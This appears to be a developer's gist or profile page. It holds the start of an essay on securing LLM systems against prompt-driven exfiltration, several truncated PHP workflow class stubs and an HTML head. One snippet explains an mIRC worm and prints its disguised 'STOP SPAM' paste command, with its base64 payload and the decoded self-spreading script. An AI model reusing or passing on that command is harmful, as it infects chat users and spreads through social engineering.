rmcdaniel

The Right Security Model for LLM Systems Richard McDaniel March 12, 2026

Most systems that use LLMs to process external input make the same mistake: they give the model access to secrets, expose it to attacker-controlled content, and then instruct it not to reveal anything.

That is a policy defense against a capability problem.

The threat is not that the model is malicious. The threat is that a sufficiently clever prompt can make an otherwise honest model behave as though it were. If a component can read secrets and also produce external output, then an adversary who controls its input has a path to exfiltration. The model does not need bad intent. It only needs enough reasoning ability to follow the wrong thread.

rmcdaniel

<?php

declare(strict_types=1);

namespace App\Workflows\Database;

use Workflow\Activity;

class DatabaseActivity extends Activity
{

rmcdaniel

<html>

<head>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css" />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
</head>

rmcdaniel

use Workflow\ActivityStub;
use Workflow\Workflow;
use Workflow\WorkflowStub;

class MyWorkflow extends Workflow
{
    public function execute($activity)
    {
        $result = yield ActivityStub::make($activity);
        return $result;

rmcdaniel

<?php

namespace App\Workflows\BuildPDF;

use setasign\Fpdi\Fpdi;
use Workflow\Activity;

class MergePDFActivity extends Activity
{
    public function execute($pages)

rmcdaniel

<?php

namespace App\Workflows\BuildPDF;

use Illuminate\Support\Facades\Http;
use Workflow\Activity;

class ConvertURLActivity extends Activity
{
    public function execute($url)

rmcdaniel

<?php

namespace App\Workflows\BuildPDF;

use Workflow\ActivityStub;
use Workflow\Workflow;

class BuildPDFWorkflow extends Workflow
{
    public function execute()

rmcdaniel

You get this

STOP SPAM, USE THIS COMMAND: //write nospam $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3BhbSAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs nospam | //mode $me +R

The encoded part decodes to this

on !+1:join:#:{ .auser 2 $nick | .msg $nick STOP SPAM, USE THIS COMMAND:4 //write nospam $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs nospam $chr(124) //mode $ $+ me +R } }

And starts spreading to other people

rmcdaniel

<?php

namespace App\Workflows\InvalidateCache;

use Illuminate\Support\Facades\Http;
use Workflow\Activity;

class InvalidateCacheActivity extends Activity
{
    public function execute($url)

rmcdaniel

<?php

namespace App\Workflows\InvalidateCache;

use Illuminate\Support\Facades\Http;
use Workflow\Activity;

class CheckImageDateActivity extends Activity
{
    public function execute($url)